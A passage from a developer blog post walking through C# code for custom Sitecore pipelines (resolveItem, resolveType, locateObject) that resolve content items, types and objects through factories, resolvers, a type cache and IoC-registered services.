custom pipeline to “resolve” a Sitecore Item. The following class serves as its arguments data transfer object (DTO): using System.Collections.Generic; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sitecore.Pipelines; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem { public class ResolveItemArgs : PipelineArgs { public Database Database { get; set; } public string ItemPath { get; set; } public Language Language { get; set; } public IList<IItemResolver> ItemResolvers { get; set; } = new List<IItemResolver>(); public Item Item { get; set; } } } The resolution of an Item will be done by a collection of IItemResolver instances — these are defined further down in this post — which ultimately do the resolution of the Item. Next, I created the following arguments class for IItemResolver instances: using Sitecore.Data; using Sitecore.Globalization; namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers { public class ItemResolverArguments { public Database Database { get; set; } public Language Language { get; set; } public string ItemPath { get; set; } } } Since I hate calling the “new” keyword directly on classes, I created the following factory interface which will construct the argument objects for both the pipeline and service classes for resolving an Item: using Sitecore.Data; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers { public interface IItemResolverArgumentsFactory { ItemResolverArguments CreateItemResolverArguments(ResolveTypeArgs args); ItemResolverArguments CreateItemResolverArguments(ResolveItemArgs args); ItemResolverArguments CreateItemResolverArguments(Database database = null, Language language = null, string itemPath = null); ResolveItemArgs CreateResolveItemArgs(ItemResolverArguments arguments); ResolveItemArgs CreateResolveItemArgs(Database database = null, Language language = null, string itemPath = null); } } Here is the class that implements the interface above: using Sitecore.Data; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers { public class ItemResolverArgumentsFactory : IItemResolverArgumentsFactory { public ItemResolverArguments CreateItemResolverArguments(ResolveTypeArgs args) { if (args == null) { return null; } return CreateItemResolverArguments(args.Database, args.Language, args.ItemPath); } public ItemResolverArguments CreateItemResolverArguments(ResolveItemArgs args) { if (args == null) { return null; } return CreateItemResolverArguments(args.Database, args.Language, args.ItemPath); } public ItemResolverArguments CreateItemResolverArguments(Database database = null, Language language = null, string itemPath = null) { return new ItemResolverArguments { Database = database, Language = language, ItemPath = itemPath }; } public ResolveItemArgs CreateResolveItemArgs(ItemResolverArguments arguments) { if (arguments == null) { return null; } return CreateResolveItemArgs(arguments.Database, arguments.Language, arguments.ItemPath); } public ResolveItemArgs CreateResolveItemArgs(Database database = null, Language language = null, string itemPath = null) { return new ResolveItemArgs { Database = database, Language = language, ItemPath = itemPath }; } } } It just creates argument types for the pipeline and service classes. The following interface is for classes that “resolve” Items based on arguments set on an ItemResolverArguments instance: using Sitecore.Data.Items; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers { public interface IItemResolver { Item Resolve(ItemResolverArguments arguments); } } I created a another interface for an IItemResolver which resolves an Item from a Sitecore Database: namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers { public interface IDatabaseItemResolver : IItemResolver { } } The purpose of this interface is so I can register it and the following class which implements it in the Sitecore IoC container: using Sitecore.Data.Items; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers { public class DatabaseItemResolver : IDatabaseItemResolver { public Item Resolve(ItemResolverArguments arguments) { if (!CanResolveItem(arguments)) { return null; } if(arguments.Language == null) { return arguments.Database.GetItem(arguments.ItemPath); } return arguments.Database.GetItem(arguments.ItemPath, arguments.Language); } protected virtual bool CanResolveItem(ItemResolverArguments arguments) => arguments != null && arguments.Database != null && !string.IsNullOrWhiteSpace(arguments.ItemPath); } } The instance of the class above will return a Sitecore Item if a Database and Item path (this can be an Item ID) are supplied via the ItemResolverArguments instance passed to its Reolve() method. Now, let’s start constructing the processors for the pipeline: First, I created an interface and class for adding a “default” IItemResolver to a collection of IItemResolver defined on the pipeline’s arguments object: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.AddDefaultItemResolverProcessor { public interface IAddDefaultItemResolver { void Process(ResolveItemArgs args); } } using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.AddDefaultItemResolverProcessor { public class AddDefaultItemResolver : ResolveProcessor<ResolveItemArgs>, IAddDefaultItemResolver { private readonly IDatabaseItemResolver _databaseItemResolver; public AddDefaultItemResolver(IDatabaseItemResolver databaseItemResolver) { _databaseItemResolver = databaseItemResolver; } protected override bool CanProcess(ResolveItemArgs args) => base.CanProcess(args) && args.ItemResolvers != null; protected override void Execute(ResolveItemArgs args) => args.ItemResolvers.Add(GetTypeResolver()); protected virtual IItemResolver GetTypeResolver() => _databaseItemResolver; } } In the above class, I’m injecting the IDatabaseItemResolver instance — this was shown further up in this post — into the constructor of this class, and then adding it to the collection of resolvers. I then created the following interface and implementation class to doing the “resolving” of the Item: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.ResolveItemProcessor { public interface IResolveItem { void Process(ResolveItemArgs args); } } using System.Linq; using Sitecore.Data.Items; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.ResolveItemProcessor { public class ResolveItem : ResolveProcessor<ResolveItemArgs>, IResolveItem { private readonly IItemResolverArgumentsFactory _itemResolverArgumentsFactory; public ResolveItem(IItemResolverArgumentsFactory itemResolverArgumentsFactory) { _itemResolverArgumentsFactory = itemResolverArgumentsFactory; } protected override bool CanProcess(ResolveItemArgs args) => base.CanProcess(args) && args.Database != null && !string.IsNullOrWhiteSpace(args.ItemPath) && args.ItemResolvers.Any(); protected override void Execute(ResolveItemArgs args) => args.Item = GetItem(args); protected virtual Item GetItem(ResolveItemArgs args) { ItemResolverArguments arguments = CreateItemResolverArguments(args); if (arguments == null) { return null; } foreach (IItemResolver resolver in args.ItemResolvers) { Item item = resolver.Resolve(arguments); if (item != null) { return item; } } return null; } protected virtual ItemResolverArguments CreateItemResolverArguments(ResolveItemArgs args) => _itemResolverArgumentsFactory.CreateItemResolverArguments(args); } } The class above just iterates over all IItemResolver instances on the PipelineArgs instance; passes an ItemResolverArguments instance the Resolve() method on each — the ItemResolverArguments instance is created from a factory — and returns the first Item found by one of the IItemResolver instances. If none were found, null is returned. Now, we need to create a service class that calls the custom pipeline. I created the following class to act as a settings class for the service. namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers { public class ItemResolverServiceSettings { public string ResolveItemPipelineName { get; set; } } } An instance of this class will be injected into the service — the instance is created by the Sitecore Configuration Factory — and its ResolveItemPipelineName property will contain a value from Sitecore Configuration (see the Sitecore patch configuration file towards the bottom of this blog post). I then created the following interface for the service — it’s just another IItemResolver — so I can register it in the Sitecore IoC container: namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers { public interface IItemResolverService : IItemResolver { } } The following class implements the interface above: using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers; using Sitecore.Abstractions; using Sitecore.Data.Items; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers { public class ItemResolverService : PipelineObjectResolver<ItemResolverArguments, ResolveItemArgs, Item>, IItemResolverService { private readonly ItemResolverServiceSettings _settings; private readonly IItemResolverArgumentsFactory _itemResolverArgumentsFactory; public ItemResolverService(ItemResolverServiceSettings settings, IItemResolverArgumentsFactory itemResolverArgumentsFactory, BaseCorePipelineManager corePipelineManager) : base(corePipelineManager) { _settings = settings; _itemResolverArgumentsFactory = itemResolverArgumentsFactory; } protected override Item GetObject(ResolveItemArgs args) { return args.Item; } protected override ResolveItemArgs CreatePipelineArgs(ItemResolverArguments arguments) => _itemResolverArgumentsFactory.CreateResolveItemArgs(arguments); protected override string GetPipelineName() => _settings.ResolveItemPipelineName; } } The above class subclasses the abstract PipelineObjectResolver class I had shown further above in this post. Most of the magic happens in that base class — for those interested in design patterns, this is an example of the Template Method pattern if you did not know — and all subsequent custom pipeline wrapping service classes will follow this same pattern. I’m not going to go much into detail on the above class as it should be self-evident on what’s happening after looking at the PipelineObjectResolver further up in this post. <resolveType /> I then started code for the next pipeline — a pipeline to resolve Types. I created the following PipelineArgs subclass class whose instances will serve as arguments to this new pipeline: using System; using System.Collections.Generic; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sitecore.Pipelines; using Sandbox.Foundation.ObjectResolution.Services.Cachers; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType { public class ResolveTypeArgs : PipelineArgs { public Database Database { get; set; } public string ItemPath { get; set; } public Language Language { get; set; } public IItemResolver ItemResolver { get; set; } public Item Item { get; set; } public string TypeFieldName { get; set; } public string TypeName { get; set; } public IList<ITypeResolver> TypeResolvers { get; set; } = new List<ITypeResolver>(); public ITypeCacher TypeCacher { get; set; } public Type Type { get; set; } public bool UseTypeCache { get; set; } } } I then created the following class to serve as an arguments object for services that will resolve types: using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers { public class TypeResolverArguments { public Database Database { get; set; } public Language Language { get; set; } public string ItemPath { get; set; } public Item Item { get; set; } public string TypeFieldName { get; set; } public string TypeName { get; set; } public bool UseTypeCache { get; set; } } } As I had done for the previous resolver, I created a factory to create arguments for both the PipelineArgs and arguments used by the service classes. Here is the interface for that factory class: using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject; using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers { public interface ITypeResolverArgumentsFactory { TypeResolverArguments CreateTypeResolverArguments(ResolveObjectArgs args); TypeResolverArguments CreateTypeResolverArguments(LocateObjectArgs args); TypeResolverArguments CreateTypeResolverArguments(CreateObjectArgs args); TypeResolverArguments CreateTypeResolverArguments(ResolveTypeArgs args); TypeResolverArguments CreateTypeResolverArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, bool useTypeCache = false); ResolveTypeArgs CreateResolveTypeArgs(TypeResolverArguments arguments); ResolveTypeArgs CreateResolveTypeArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, bool useTypeCache = false); } } The following class implements the interface above: using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject; using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers { public class TypeResolverArgumentsFactory : ITypeResolverArgumentsFactory { public TypeResolverArguments CreateTypeResolverArguments(ResolveObjectArgs args) { if (args == null) { return null; } return CreateTypeResolverArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.UseTypeCache); } public TypeResolverArguments CreateTypeResolverArguments(LocateObjectArgs args) { if (args == null) { return null; } return CreateTypeResolverArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.UseTypeCache); } public TypeResolverArguments CreateTypeResolverArguments(CreateObjectArgs args) { if (args == null) { return null; } return CreateTypeResolverArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.UseTypeCache); } public TypeResolverArguments CreateTypeResolverArguments(ResolveTypeArgs args) { return CreateTypeResolverArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.UseTypeCache); } public TypeResolverArguments CreateTypeResolverArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, bool useTypeCache = false) { return new TypeResolverArguments { Database = database, Language = language, ItemPath = itemPath, Item = item, TypeFieldName = typeFieldName, TypeName = typeName, UseTypeCache = useTypeCache }; } public ResolveTypeArgs CreateResolveTypeArgs(TypeResolverArguments arguments) { if (arguments == null) { return null; } return CreateResolveTypeArgs(arguments.Database, arguments.Language, arguments.ItemPath, arguments.Item, arguments.TypeFieldName, arguments.TypeName, arguments.UseTypeCache); } public ResolveTypeArgs CreateResolveTypeArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, bool useTypeCache = false) { return new ResolveTypeArgs { Database = database, Language = language, ItemPath = itemPath, Item = item, TypeFieldName = typeFieldName, TypeName = typeName, UseTypeCache = useTypeCache }; } } } I’m not going to discuss much on the class above — it just creates instances of TypeResolverArguments and ResolveTypeArgs based on a variety of things provided to each method. I then created the following interface for a pipeline processor to resolve an Item and set it on the passed PipelineArgs instance if one wasn’t provided by the caller or set by another processor: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetItemResolverProcessor { public interface ISetItemResolver { void Process(ResolveTypeArgs args); } } The following class implements the interface above: using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetItemResolverProcessor { public class SetItemResolver : ResolveProcessor<ResolveTypeArgs>, ISetItemResolver { private readonly IItemResolverService _itemResolverService; public SetItemResolver(IItemResolverService itemResolverService) { _itemResolverService = itemResolverService; } protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.Database != null && !string.IsNullOrWhiteSpace(args.ItemPath); protected override void Execute(ResolveTypeArgs args) => args.ItemResolver = GetItemResolver(); protected virtual IItemResolver GetItemResolver() => _itemResolverService; } } In the class above, I’m injecting an instance of a IItemResolverService into its constructor, and setting it on the ItemResolver property of the ResolveTypeArgs instance. Does this IItemResolverService interface look familiar? It should as it’s the IItemResolverService defined further up in this post which calls the <resolveItem /> pipeline. Now we need a processor to resolve the Item. The following interface and class do this: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor { public interface IResolveItem { void Process(ResolveTypeArgs args); } } using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor { public class ResolveItem : ResolveProcessor<ResolveTypeArgs>, IResolveItem { private readonly IItemResolverArgumentsFactory _itemResolverArgumentsFactory; public ResolveItem(IItemResolverArgumentsFactory itemResolverArgumentsFactory) { _itemResolverArgumentsFactory = itemResolverArgumentsFactory; } protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.Database != null && args.ItemResolver != null; protected override void Execute(ResolveTypeArgs args) => args.Item = args.ItemResolver.Resolve(CreateTypeResolverArguments(args)); protected virtual ItemResolverArguments CreateTypeResolverArguments(ResolveTypeArgs args) => _itemResolverArgumentsFactory.CreateItemResolverArguments(args); } } The class above just delegates to the IItemResolver instance on the ResolveTypeArgs instance to resolve the Item. Next, we need a processor to get the fully qualified type name from the Item. The following interface and class are for a processor that does just that: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeNameProcessor { public interface ISetTypeName { void Process(ResolveTypeArgs args); } } namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeNameProcessor { public class SetTypeName : ResolveProcessor<ResolveTypeArgs>, ISetTypeName { protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.Item != null && !string.IsNullOrWhiteSpace(args.TypeFieldName); protected override void Execute(ResolveTypeArgs args) => args.TypeName = args.Item[args.TypeFieldName]; } } The class above just gets the value from the field where the fully qualified type is defined — the name of the field where the fully qualified type name is defined should be set by the caller of this pipeline. I then defined the following interface and class which will sort out what the Type object is based on a fully qualified type name passed to it: using System; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers { public interface ITypeResolver { Type Resolve(TypeResolverArguments arguments); } } I then created the following interface for a service class that will delegate to Sitecore.Reflection.ReflectionUtil to get a Type with a provided fully qualified type name: using System; namespace Sandbox.Foundation.ObjectResolution.Services.Reflection { public interface IReflectionUtilService { Type GetTypeInfo(string type); object CreateObject(Type type); object CreateObject(Type type, object[] parameters); } } Here’s the class that implements the interface above: using System; using Sitecore.Reflection; namespace Sandbox.Foundation.ObjectResolution.Services.Reflection { public class ReflectionUtilService : IReflectionUtilService { public Type GetTypeInfo(string type) { return ReflectionUtil.GetTypeInfo(type); } public object CreateObject(Type type) { return ReflectionUtil.CreateObject(type); } public object CreateObject(Type type, object[] parameters) { return ReflectionUtil.CreateObject(type, parameters); } } } The class above also creates objects via the ReflectionUtil static class with a passed type and constructor arguments — this will be used in the <createObject /> pipeline further down in this post. I then defined the following interface for a class that will leverage the IReflectionUtilService service above: namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers { public interface IReflectionTypeResolver : ITypeResolver { } } This is the class that implements the interface above: using System; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Services.Reflection; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers { public class ReflectionTypeResolver : IReflectionTypeResolver { private readonly IReflectionUtilService _reflectionUtilService; public ReflectionTypeResolver(IReflectionUtilService reflectionUtilService) { _reflectionUtilService = reflectionUtilService; } public Type Resolve(TypeResolverArguments arguments) { if (string.IsNullOrWhiteSpace(arguments?.TypeName)) { return null; } return GetTypeInfo(arguments.TypeName); } protected virtual Type GetTypeInfo(string typeName) => _reflectionUtilService.GetTypeInfo(typeName); } } The class above just delegates to the IReflectionUtilService to get the Type with the supplied fully qualified type name. I then created the following interface and class to represent a pipeline processor to add the ITypeResolver above to the collection of ITypeResolver on the ResolveTypeArgs instance passed to it: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.AddDefaultTypeResolverProcessor { public interface IAddDefaultTypeResolver { void Process(ResolveTypeArgs args); } } using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.AddDefaultTypeResolverProcessor { public class AddDefaultTypeResolver : ResolveProcessor<ResolveTypeArgs>, IAddDefaultTypeResolver { private readonly IReflectionTypeResolver _reflectionTypeResolver; public AddDefaultTypeResolver(IReflectionTypeResolver reflectionTypeResolver) { _reflectionTypeResolver = reflectionTypeResolver; } protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.TypeResolvers != null; protected override void Execute(ResolveTypeArgs args) => args.TypeResolvers.Add(GetTypeResolver()); protected virtual ITypeResolver GetTypeResolver() => _reflectionTypeResolver; } } There isn’t much going on in the class above. The Execute() method just adds the IReflectionTypeResolver to the TypeResolvers collection. When fishing through the Sitecore Experience Forms assemblies, I noticed the OOTB code was “caching” Types it had resolved from Type fields.. I decided to employ the same approach, and defined the following interface for an object that caches Types: using System; namespace Sandbox.Foundation.ObjectResolution.Services.Cachers { public interface ITypeCacher { void AddTypeToCache(string typeName, Type type); Type GetTypeFromCache(string typeName); } } Here is the class that implements the interface above: using System; using System.Collections.Concurrent; namespace Sandbox.Foundation.ObjectResolution.Services.Cachers { public class TypeCacher : ITypeCacher { private static readonly ConcurrentDictionary<string, Type> TypeCache = new ConcurrentDictionary<string, Type>(); public void AddTypeToCache(string typeName, Type type) { if (string.IsNullOrWhiteSpace(typeName) || type == null) { return; } TypeCache.TryAdd(typeName, type); } public Type GetTypeFromCache(string typeName) { if (string.IsNullOrWhiteSpace(typeName)) { return null; } Type type; if (!TypeCache.TryGetValue(typeName, out type)) { return null; } return type; } } } The AddTypeToCache() method does exactly what the method name says — it will add the supplied Type to cache with the provided type name as the key into the ConcurrentDictionary dictionary on this class. The GetTypeFromCache() method above tries to get a Type from the ConcurrentDictionary instance on this class, and returns to the caller if it was found. If it wasn’t found, null is returned. The following interface and class serve as a pipeline processor to set a ITypeCacher instance on the ResolveTypeArgs instance passed to it: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeCacherProcessor { public interface ISetTypeCacher { void Process(ResolveTypeArgs args); } } using Sandbox.Foundation.ObjectResolution.Services.Cachers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeCacherProcessor { public class SetTypeCacher : ResolveProcessor<ResolveTypeArgs>, ISetTypeCacher { private readonly ITypeCacher _typeCacher; public SetTypeCacher(ITypeCacher typeCacher) { _typeCacher = typeCacher; } protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.UseTypeCache && args.TypeCacher == null; protected override void Execute(ResolveTypeArgs args) => args.TypeCacher = GetTypeCacher(); protected virtual ITypeCacher GetTypeCacher() => _typeCacher; } } There isn’t much going on in the class above except the injection of the ITypeCacher instance defined further up, and setting that instance on the ResolveTypeArgs instance if it hasn’t already been set. Now, we need to resolve the Type. The following interface and its implementation class do just that: namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor { public interface IResolveType { void Process(ResolveTypeArgs args); } } using System; using System.Linq; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.ResolveTypeProcessor { public class ResolveType : ResolveProcessor<ResolveTypeArgs>, IResolveType { private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory; public ResolveType(ITypeResolverArgumentsFactory typeResolverArgumentsFactory) { _typeResolverArgumentsFactory = typeResolverArgumentsFactory; } protected override bool CanProcess(ResolveTypeArgs args) => base.CanProcess(args) && args.TypeResolvers != null && args.TypeResolvers.Any() && !string.IsNullOrWhiteSpace(args.TypeName); protected override void Execute(ResolveTypeArgs args) => args.Type = Resolve(args); protected virtual Type Resolve(ResolveTypeArgs args) { Type type = null; if (args.UseTypeCache) { type = GetTypeFromCache(args); } if (type == null) { type = GetTypeInfo(args); } return type; } protected virtual Type GetTypeInfo(ResolveTypeArgs args) { TypeResolverArguments arguments = CreateTypeResolverArguments(args); if (arguments == null) { return null; } foreach (ITypeResolver typeResolver in args.TypeResolvers) { Type type = typeResolver.Resolve(arguments); if (type != null) { return type; } } return null; } protected virtual Type GetTypeFromCache(ResolveTypeArgs args) => args.TypeCacher.GetTypeFromCache(args.TypeName); protected virtual TypeResolverArguments CreateTypeResolverArguments(ResolveTypeArgs args) => _typeResolverArgumentsFactory.CreateTypeResolverArguments(args); } } Just as I had done in the <resolveItem /> pipeline further up in this post, the above processor class will iterate over a collection of “resolvers” on the PipelineArgs instance — in this case it’s the TypeResolvers — and pass an arguments instance to each’s Resolve() method. This arguments instance is created from a factory defined further up in this post. I then created the following settings class for the service class that will wrap the <resolveType /> pipeline: namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers { public class TypeResolverServiceSettings { public string ResolveTypePipelineName { get; set; } } } The value on the ResolveTypePipelineName property will come from the Sitecore patch file towards the bottom of this post. I then created the following interface for the service class that will wrap the pipeline — if you are a design patterns buff, this is an example of the adapter pattern: namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers { public interface ITypeResolverService : ITypeResolver { } } The following class implements the interface above: using System; using Sitecore.Abstractions; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType; using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers { public class TypeResolverService : PipelineObjectResolver<TypeResolverArguments, ResolveTypeArgs, Type>, ITypeResolverService { private readonly TypeResolverServiceSettings _settings; private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory; public TypeResolverService(TypeResolverServiceSettings settings, ITypeResolverArgumentsFactory typeResolverArgumentsFactory, BaseCorePipelineManager corePipelineManager) : base(corePipelineManager) { _settings = settings; _typeResolverArgumentsFactory = typeResolverArgumentsFactory; } protected override Type GetObject(ResolveTypeArgs args) { return args.Type; } protected override ResolveTypeArgs CreatePipelineArgs(TypeResolverArguments arguments) => _typeResolverArgumentsFactory.CreateResolveTypeArgs(arguments); protected override string GetPipelineName() => _settings.ResolveTypePipelineName; } } I’m not going to go into details about the class above as it’s just like the other service class which wraps the <resolveItem /> defined further above in this post. Still following? We’re almost there. 😉 <locateObject /> So we now have a way to resolve Items and Types, we now need to find a Type from an Item in the IoC container. I created a PipelineArgs class for a pipeline that does just that: using System; using System.Collections.Generic; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sitecore.Pipelines; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers; namespace Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject { public class LocateObjectArgs : PipelineArgs { public Database Database { get; set; } public string ItemPath { get; set; } public Language Language { get; set; } public Item Item { get; set; } public string TypeFieldName { get; set; } public string TypeName { get; set; } public bool UseTypeCache { get; set; } public ITypeResolver TypeResolver { get; set; } public Type Type { get; set; } public IList<IObjectLocator> Locators { get; set; } = new List<IObjectLocator>(); public object Object { get; set; } } } In reality, this next pipeline can supply an object from anywhere — it doesn’t have to be from an IoC container but that’s what I’m doing here. I did, however, make it extendable so you can source an object from wherever you want, even from the Post Office. 😉 I then created the following arguments object for service classes that will “locate” objects: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators { public class ObjectLocatorArguments { public Database Database { get; set; } public Language Language { get; set; } public string ItemPath { get; set; } public Item Item { get; set; } public string TypeFieldName { get; set; } public string TypeName { get; set; } public Type Type { get; set; } public bool UseTypeCache { get; set; } } } As I had done for the previous two “resolvers”, I created a factory to create arguments objects — both for the pipeline and service classes: using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators { public interface IObjectLocatorArgumentsFactory { ObjectLocatorArguments CreateObjectLocatorArguments(ResolveObjectArgs args); ObjectLocatorArguments CreateObjectLocatorArguments(LocateObjectArgs args); ObjectLocatorArguments CreateObjectLocatorArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false); LocateObjectArgs CreateLocateObjectArgs(ObjectLocatorArguments arguments); LocateObjectArgs CreateLocateObjectArgs(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false); } } using System; using Sitecore.Data; using Sitecore.Data.Items; using Sitecore.Globalization; using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators; using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject; using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject; namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators { public class ObjectLocatorArgumentsFactory : IObjectLocatorArgumentsFactory { public ObjectLocatorArguments CreateObjectLocatorArguments(ResolveObjectArgs args) { if (args == null) { return null; } return CreateObjectLocatorArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.Type, args.UseTypeCache); } public ObjectLocatorArguments CreateObjectLocatorArguments(LocateObjectArgs args) { if (args == null) { return null; } return CreateObjectLocatorArguments(args.Database, args.Language, args.ItemPath, args.Item, args.TypeFieldName, args.TypeName, args.Type, args.UseTypeCache); } public ObjectLocatorArguments CreateObjectLocatorArguments(Database database = null, Language language = null, string itemPath = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false) { return new ObjectLocatorArguments { Database = database, Language = language, ItemPath = itemPath, Item = item, TypeFieldName = typeFieldName, TypeName = typeName, Type = type }; } public LocateObjectArgs CreateLocateObjectArgs(ObjectLocatorArguments arguments) { if (arguments == null) { return null; } return CreateLocateObjectArgs(arguments.Database, arguments.Language, arguments.ItemPath, arguments.Item, arguments.TypeFieldName, arguments.TypeName, arguments.Type, 